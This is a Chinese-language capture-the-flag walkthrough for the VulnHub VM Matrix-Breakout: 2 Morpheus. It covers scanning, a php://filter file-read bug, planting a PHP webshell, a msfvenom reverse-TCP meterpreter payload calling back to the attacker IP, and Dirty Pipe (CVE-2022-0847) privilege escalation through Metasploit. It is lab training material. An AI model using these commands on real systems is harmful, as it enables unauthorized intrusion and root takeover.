MATRIX-BREAKOUT: 2 MORPHEUS~vulnhub

提示

攻击机：192.168.75.151
靶机：192.168.75.150
下载地址：https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
知识点：文件上传、php伪协议、shell反弹、漏洞收集脚本的使用、CVE-2022-0847提权

信息收集

主机探针/端口扫描

nmap 192.168.75.0/24

探测到22 80 81端口

文件目录扫描

gobuster dir -u 192.168.75.150 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

访问可疑文件graffiti.php graffiti.txt

使用brupsuite抓取提交的数据包进行分析，发现其存在参数file=graffiti.txt，并且返回的数据包中显示了graffiti.txt文件的信息

那这里就存在文件读取漏洞。那我们使用php伪协议读取下graffiti.php文件的源码信息，命令：php://filter/read=convert.base64-encode/resource=graffiti.php，将获得加密数据进行base64解码，获得源码信息

然后Base64解码

文件上传get shell

分析graffiti.php代码发现，当$file参数默认为graffiti.txt，但是当我们传递$file参数时会覆盖掉原来的默认值，因此这里我们可以直接写入后门文件，一句话后门：，然后使用蚁剑进行连接，成功获得shell权限

后门连接成功

反弹shell

首先利用MSFvenom生成反弹shell文件

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

然后将文件上传到网站中

然后msf进行监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.75.151
run

然后在后门管理工具中执行文件

./shell.elf

反弹成功后执行shell命令，ls查看文件列表 然后发现flag1

CVE-2022-0847提权

首先去下载漏洞扫描工具
https://github.com/carlospolop/PEASS-ng/releases
然后通过蚁剑上传 在MSF中执行./linpeas.sh
我们可以看到Dirtypipe

然后退出shell模式 background 保存为session 1 漏洞搜索

search dirtypipe
use 0
set session 1
set lhost 192.168.75.151
run

获得root权限后在/root目录下发现FLAG.txt文件
然后成功得到最后的FLAG2